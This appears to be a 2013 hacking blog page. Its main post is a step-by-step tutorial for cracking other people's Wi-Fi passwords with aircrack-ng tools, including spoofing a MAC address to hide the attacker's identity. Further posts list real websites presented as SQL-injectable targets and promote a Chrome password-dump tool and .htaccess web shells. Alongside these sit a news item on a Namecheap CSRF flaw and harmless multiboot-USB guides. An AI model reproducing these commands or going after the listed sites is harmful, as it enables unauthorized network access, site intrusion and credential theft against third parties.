Wednesday, December 25, 2013

How to Hack a Wi-Fi Password | Crack Wi-Fi Passwords Easily

Hi Guys, I am back with another amazing hacking tutorial. I hope you are learning well from my other posts. In this post I will be teaching you How to Hack a Wi-Fi password. The following post will teach you how to crack wifi passwords easily in minutes.We strictly advise our readers to follow the tricks and tutorials presented at How to Hack at their own risk. We are sharing this knowledge for educational purpose only, well most of it! Blah Blah blah.Phew! Done with the formalities, now let us start with the Wi-FI cracking. But before starting the tutorial let me give you a small introduction to what Wi-Fi hacking is and what are the security protocols associated with it.In a secured wireless connected the data on internet is sent via encrypted packets. These packets are secured with network keys.

There are basically 2 types of security keys :

WEP( Wireless Encryption Protocol) : This is the most basic form of encryption. This has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case many people still use this encryption.WPA( Wi-FI Protected Access) : This is the most secure wireless encryption. Cracking of such network requires use of a wordlist with common passwords. This is sort of brute force attack. This is virtually uncrackable if the network is secured with a strong password.So lets begin the actual Wifi Hacking tutorial!

In order to crack wi-fi password, you require the following things :

1.A Desktop or Laptop having a Wireless Adapter
2.Backtrack Live DVD : This DVD is used to boot into backtrack OS, Backtrack OS is a hacking OS and will be used in my further hacking tutorials that is why I am asking to download it. It can be downloaded at : Download Backtrack to hack wifi Passwords
3.Brain! ( The most important part)
These are the things you require now let us proceed with the steps to crack wifi passwords easily.

1.Download the Backtrack OS ISO image and burn it to a DVD. Boot from that DVD ( Insert that DVD into CD-ROM and restart your PC.) You will see backtrack starting. Choose “Backtrack Default text version”. After that it will start executing some commands. Wait till you see something like in the following screenshot :
You will see root@bt:’# , Type startx and hit enter.
The color of the screen will be different as the screenshot is of the earlier version of backtrack. You will get a red-black screen of backtrack. Wait for few minutes, after it is done, you will get a desktop like version of backtrack.
Now Open the Konsole from the taskbar, Click on the icon against the dragon like icon in the taskbar in the above screenshot.You will have a Command Prompt like Shell.

2).Type airmon-ng and hit Enter. You will have a screen like this, note down the name of interface, in our case the the name is wlan0.
3.Now type ifconfig wlan0 down and hit enter.
This command will disable your wireless adapter, we are doing this in order to change your MAC address.

 3.Now type ifconfig wlan0 hw ether 00:11:22:33:44:55 and hit enter.
This command will change your MAC address to 00:11:22:33:44:55 in order to hide your identity.

4.Now type airmon-ng start wlan0 and hit enter.
This will start the network adapter in monitor mode. Note down the new interface name, it could be eth0  or mon0 or something like that.
The above command has started our network adapter in monitor mode as mon0,  note down this name.

5.After this type airmon-ng mon0 and hit enter
Replace the mon0 with interface name you discovered in step 4. This command will show you the list of available networks. Press Ctrl+C to stop the airmon to search for more networds. Copy the BSSID of the wireless network which you want to hack.
In the above screenshot there is a list of available networks, Choose 1 network and note the BSSID andchannel of it.

6.Type airodump-ng -c channelno –bssid BSSIDN1 mon0 -w filename and hit enter.
Replace channelno and BSSIDN1 with the data from step 5. Replace the mon0 with network interface name from step 4. In place of filename write anyname and do remember that. Better use filename itself.
This command will begin capturing the packets from the network.You need to capture more and more packets in order to crack the wifi password. This packet capturing is a slow process.

7.To make the packet capturing faster, we will use another command. Open a new shell, don’t close the previous shell. In new shell type aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit enter.
Replace the BSSIDN1 with the data from step 5 and mon0 from step 4. This command will boost the data capturing process.The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address and the command ends with the your wireless adapters device name.

8.Now wait for few mins, let the DATA in the other console reach a count of 5000.
The data in above screenshot is 1, wait for that to reach 5000.

9.After it reaches 5000, open another console and type aircrack-ng filename-01.cap and hit enter.
Replace the filename with the name you used in step 6. Add -01.cap to it. .cap is the extension of file having captured data packets.After typing this command, aircrack will start trying to crack the Wi-FI password. If the encryption used is WEP, it will surely crack the password within few minutes.

In case of WPA use the following command instead of the above aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap

Replace BSSIDN1 and filename with data you used. /pentest/wireless/aircrack-ng/test/password.lst is the address of a file having wordlist of popular passwords. In case of WPA aircrack will try to brute force the password. As I explained above that to crack WPA you need a file having passwords to crack the encryption. If you are lucky enough and the network owner is not smart enough, you will get the password.

I hope that you will get what I have explained above, to make the explanation even more clear, I have made a sample video for you guys. I hope you will love this video :

 
Well that is all for this Wi-Fi Cracking Tutorial. I hope now you will know how to hack a wifi password easily.






Namecheap CSRF Vulnerability could lead to DNS Hijacking

A Security researcher Henry Hoggard has discovered a cross site request forgery(CSRF) vulnerability in the Namecheap website that could lead attackers to hijack the DNS records.
An attacker could have exploited this vulnerability and redirect the websites to fake website.  The attacker could also have managed to display defacement message.In his blog post, the researcher said the vulnerability could allowed hackers to redirect MX records and intercept email.
In an email sent to ThreatPost, the researcher said "This would have impacted all customers, which I’m sure is a lot of high profile websites, as Namecheap is one of the most popular domain registrars".





Saturday, December 14, 2013

MultiSystem – Create a MultiBoot USB from Linux

How to Create a MultiBoot USB Flash Drive from Linux: Multisystem is an awesome tool created by LiveUSB.info, that works similar to our Windows based MultiBootISOs USB creator, but was created for use within Linux. It also uses Grub2 instead of Grub Legacy, and can be run from within Ubuntu Linux to create a Custom Multiboot UFD containing your favorite Bootable Live Linux Distributions.

Official HomePage: http://liveusb.info/dotclear

Multisystem Prerequisites:

  • Ubuntu Linux or Ubuntu Based System (can use an Ubuntu CD or USB)
  • A USB Flash Drive (to use for your MultiBoot USB)
  • Working Internet Connection
  • install-depot-multiboot.sh.tar.bz2
How to Install the Multisystem LiveUSB Tool

Download and Open the Script with Ubuntu's Archive Manager

2.Extract the install-depot-multiboot.sh Script to your Desktop







3.Double Click install-depot-multiboot.sh from your desktop and select the option to "Run in Terminal"

How to Use the Multisystem LiveUSB Tool


  1. Insert a USB Drive
  2. Launch the Script via Applications > Accessories > MultiBoot
  3. Select your USB Device from the list and click Validate
4.Now simply Drag and Drop an ISO into the Window to add the Distribution (repeat the process to add more ISOs)
5.Once finished, restart your PC, set your boot menu to boot from the USB device, Select the Distro you want to Boot and enjoy!.

SARDU – Multiboot USB Creator (Windows)

SARDU is another nice Windows based Multiboot USB Creator that can also be used to create Multiboot CD/DVD's. Created by Davide Costa, SARDU enables you to create a Multiboot UFD containing your basic essential Utilities, Antivirus, and Windows XP/7 Installers. On top of that, SARDU offers the built in ability to Defragment your USB Drive, and burn an ISO to CD/DVD.

WARNING! I've been informed that SARDU is now potentially packaged with Adware. As a result, I recommend avoiding this tool. Back in Jan 2011, when this post was originally written, SARDU was a good clean tool!.If you choose to use this program, first check it for viruses/trojans/malware using an online multiple scan utility such as Virus Total.SARDU – Another Multiboot USB Creator for Windows
Authors Website: http://www.sarducd.it 

Simple usage example to create a Multiboot USB:

1.Download Unzip and Run latest version of SARDU
2.(1) Click the ISO Icon to select the folder containing your ISO's (2) Select your USB Drive (3) Click the USB Icon to Create the Multiboot USB

3.Restart your PC,setting your BIOS or Boot Menu to boot from the Flash Drive. Proceed to boot from the USB and enjoy.
  

XBOOT – Multiboot ISO USB Creator (Windows)

XBOOT is yet another neat little Multiboot ISO USB Creator. It is a Windows based application that can be used to create a Live Multiboot USB or even a Multiboot ISO file that can then be burnt to a CD/DVD. XBOOT supports many Linux Distributions and Utilities,and allows you to use your choice of a Grub or Syslinux bootloader.Also included is a built in QEMU emulator (enabling you to boot an ISO from within Windows).XBOOT – Multiboot ISO/USB Creator
Authors Website: http://sites.google.com/site/shamurxboot/

Usage Example: Creating a Live Multiboot USB with XBOOT:

1.Download, extract and run the latest version of XBOOT
2.(1) Drag and drop some ISOs into the XBOOT window (2) Select Create USB
 
3.(3) Select your USB Drive from the Droplist (4) Select a Bootloader to use (5) Click OK to begin creation.
A copy notification window appears to keep you informed of the progress. Once the process is complete, you should have a Bootable Multiboot USB Flash Drive with your ISO selections installed.


Sunday, December 8, 2013

[Chrome Password Dump] Command-line Tool to Recover Login Password from Google Chrome Browser

Chrome Password Dump is the free command-line tool to quickly recover your lost web login passwords from Google Chrome browser.

It automatically detects the default Chrome profile for current user and recovers all the stored web login passwords.

Alternatively you can also specify the custom profile path in case your Chrome user profile is not in standard location. This is very useful in recovering the login passwords from other Chrome based browsers such as Chrome SXS/Canary, CoolNovo, Flock, Comodo Dragon etc. 

Command line interface makes it helpful for Penetration Testers & Forensic investigators.

+1000 Sql Vulnerable Sites


http://www.us.ute.com/product_info.php?id=45'
http://www.avmaniacs.com/review.php?id=1335'
http://www.planetbollywood.com/displ...=m091511034819'
http://www.latintourdimensions.com/o...tail.php?id=86'
http://hamiltoncityschools.com/item/?id=671'
http://isectech.net/Forum/printthread.php?tid=578'
http://www.2hgs.com/detail_humor.php?ID=27'
http://www.2hgs.com/detail_humor.php?ID=42'
http://www.nitro-helmets.com/product...category_id=83'
http://www.tomkane.com/section.php?id=1'
http://www.medix.com.hr/aboutbook.php?id=30'
http://motdrb.com/tr/trainers.php?do...Trainer_ID=336'
+1000 Sql Vulnerable Sites Klik Here

[HTSHELLS] Self contained web shells and other attacks via .htaccess files

Attacks are named in the following fashion, module.attack.htaccess and grouped by attack type in directories. Pick the one you need and copy it to a new file named .htaccess, check the file to see if it needs editing before you upload it. Web shells executes commands from the query parameter c, unless the file states otherwise.Download  HTSHELLS

 

Subscribe in Bloglines Msn bot last visit powered by MyPagerank.Net Yahoo bot last visit powered by MyPagerank.Net
I heart FeedBurner downtime checker The Ubuntu Counter Project - user number # 31290

 
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by TadPole
FOG FLAMES